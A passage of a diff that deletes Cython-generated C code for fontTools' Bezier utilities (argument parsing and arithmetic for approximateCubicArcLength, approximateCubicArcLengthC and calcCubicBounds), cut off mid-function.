__pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 332, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, 3); __PYX_ERR(0, 332, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateCubicArcLength") < 0)) __PYX_ERR(0, 332, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLength", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 332, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - PyObject *__pyx_t_7 = NULL; - int __pyx_t_8; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateCubicArcLength", 1); - - /* "fontTools/misc/bezierTools.py":357 - * 154.80848416537057 - * """ - * return approximateCubicArcLengthC( # <<<<<<<<<<<<<< - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4) - * ) - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_approximateCubicArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 357, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - - /* "fontTools/misc/bezierTools.py":358 - * """ - * return approximateCubicArcLengthC( - * complex(*pt1), complex(*pt2), complex(*pt3), complex(*pt4) # <<<<<<<<<<<<<< - * ) - * - */ - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt4); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_7 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_7)) __PYX_ERR(0, 358, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_7); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_8 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_8 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[5] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6, __pyx_t_7}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_8, 4+__pyx_t_8); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - __Pyx_DECREF(__pyx_t_7); __pyx_t_7 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 357, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":332 - * - * - * def approximateCubicArcLength(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Approximates the arc length for a cubic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_XDECREF(__pyx_t_7); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC, "approximateCubicArcLengthC(double complex pt1, double complex pt2, double complex pt3, double complex pt4)\nApproximates the arc length for a cubic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as complex numbers.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC = {"approximateCubicArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_21approximateCubicArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - __pyx_t_double_complex __pyx_v_pt4; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateCubicArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 1); __PYX_ERR(0, 362, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 2); __PYX_ERR(0, 362, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 362, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, 3); __PYX_ERR(0, 362, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateCubicArcLengthC") < 0)) __PYX_ERR(0, 362, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - __pyx_v_pt4 = __Pyx_PyComplex_As___pyx_t_double_complex(values[3]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 376, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateCubicArcLengthC", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 362, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4) { - double __pyx_v_v0; - double __pyx_v_v1; - double __pyx_v_v2; - double __pyx_v_v3; - double __pyx_v_v4; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("approximateCubicArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":393 - * # abs(BezierCurveC[3].diff(t).subs({t:T})) for T in sorted(0, .5(3/7)**.5/2, .5, 1), - * # weighted 1/20, 49/180, 32/90, 49/180, 1/20 respectively. - * v0 = abs(pt2 - pt1) * 0.15 # <<<<<<<<<<<<<< - * v1 = abs( - * -0.558983582205757 * pt1 - */ - __pyx_v_v0 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1)) * 0.15); - - /* "fontTools/misc/bezierTools.py":394 - * # weighted 1/20, 49/180, 32/90, 49/180, 1/20 respectively. - * v0 = abs(pt2 - pt1) * 0.15 - * v1 = abs( # <<<<<<<<<<<<<< - * -0.558983582205757 * pt1 - * + 0.325650248872424 * pt2 - */ - __pyx_v_v1 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_sum_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.558983582205757, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.325650248872424, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.208983582205757, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.024349751127576, 0), __pyx_v_pt4))); - - /* "fontTools/misc/bezierTools.py":400 - * + 0.024349751127576 * pt4 - * ) - * v2 = abs(pt4 - pt1 + pt3 - pt2) * 0.26666666666666666 # <<<<<<<<<<<<<< - * v3 = abs( - * -0.024349751127576 * pt1 - */ - __pyx_v_v2 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt1), __pyx_v_pt3), __pyx_v_pt2)) * 0.26666666666666666); - - /* "fontTools/misc/bezierTools.py":401 - * ) - * v2 = abs(pt4 - pt1 + pt3 - pt2) * 0.26666666666666666 - * v3 = abs( # <<<<<<<<<<<<<< - * -0.024349751127576 * pt1 - * - 0.208983582205757 * pt2 - */ - __pyx_v_v3 = __Pyx_c_abs_double(__Pyx_c_sum_double(__Pyx_c_diff_double(__Pyx_c_diff_double(__Pyx_c_prod_double(__pyx_t_double_complex_from_parts(-0.024349751127576, 0), __pyx_v_pt1), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.208983582205757, 0), __pyx_v_pt2)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.325650248872424, 0), __pyx_v_pt3)), __Pyx_c_prod_double(__pyx_t_double_complex_from_parts(0.558983582205757, 0), __pyx_v_pt4))); - - /* "fontTools/misc/bezierTools.py":407 - * + 0.558983582205757 * pt4 - * ) - * v4 = abs(pt4 - pt3) * 0.15 # <<<<<<<<<<<<<< - * - * return v0 + v1 + v2 + v3 + v4 - */ - __pyx_v_v4 = (__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt4, __pyx_v_pt3)) * 0.15); - - /* "fontTools/misc/bezierTools.py":409 - * v4 = abs(pt4 - pt3) * 0.15 - * - * return v0 + v1 + v2 + v3 + v4 # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_1 = PyFloat_FromDouble(((((__pyx_v_v0 + __pyx_v_v1) + __pyx_v_v2) + __pyx_v_v3) + __pyx_v_v4)); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 409, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":362 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_AddTraceback("fontTools.misc.bezierTools.approximateCubicArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":412 - * - * - * def calcCubicBounds(pt1, pt2, pt3, pt4): # <<<<<<<<<<<<<< - * """Calculates the bounding rectangle for a quadratic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_22calcCubicBounds, "calcCubicBounds(pt1, pt2, pt3, pt4)\nCalculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcCubicBounds((0, 0), (25, 100), (75, 100), (100, 0))\n (0, 0, 100, 75.0)\n >>> calcCubicBounds((0, 0), (50, 0), (100, 50), (100, 100))\n (0.0, 0.0, 100, 100)\n >>> print(\"%f %f %f %f\" % calcCubicBounds((50, 0), (0, 100), (100, 100), (50, 0)))\n 35.566243 0.000000 64.433757 75.000000\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_23calcCubicBounds = {"calcCubicBounds", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_22calcCubicBounds}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_23calcCubicBounds(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - PyObject *__pyx_v_pt4 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcCubicBounds (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,&__pyx_n_s_pt4,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 1); __PYX_ERR(0, 412, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 2); __PYX_ERR(0, 412, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt4)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 412, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, 3); __PYX_ERR(0, 412, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcCubicBounds") < 0)) __PYX_ERR(0, 412, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - __pyx_v_pt4 = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcCubicBounds", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 412, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcCubicBounds", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3, __pyx_v_pt4); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4) { - PyObject *__pyx_v_ax = NULL; - PyObject *__pyx_v_ay = NULL; - PyObject *__pyx_v_bx = NULL; - PyObject *__pyx_v_by = NULL; - PyObject *__pyx_v_cx = NULL; - PyObject *__pyx_v_cy = NULL; - PyObject *__pyx_v_dx = NULL; - PyObject *__pyx_v_dy = NULL; - PyObject *__pyx_v_ax3 = NULL; - PyObject *__pyx_v_ay3 = NULL; - PyObject *__pyx_v_bx2 = NULL; - PyObject *__pyx_v_by2 = NULL; - PyObject *__pyx_v_xRoots = NULL; - PyObject *__pyx_v_yRoots = NULL; - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_points = NULL; - PyObject *__pyx_8genexpr1__pyx_v_t = NULL; - PyObject *__pyx_8genexpr2__pyx_v_t = NULL; - PyObject *__pyx_8genexpr3__pyx_v_t = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject 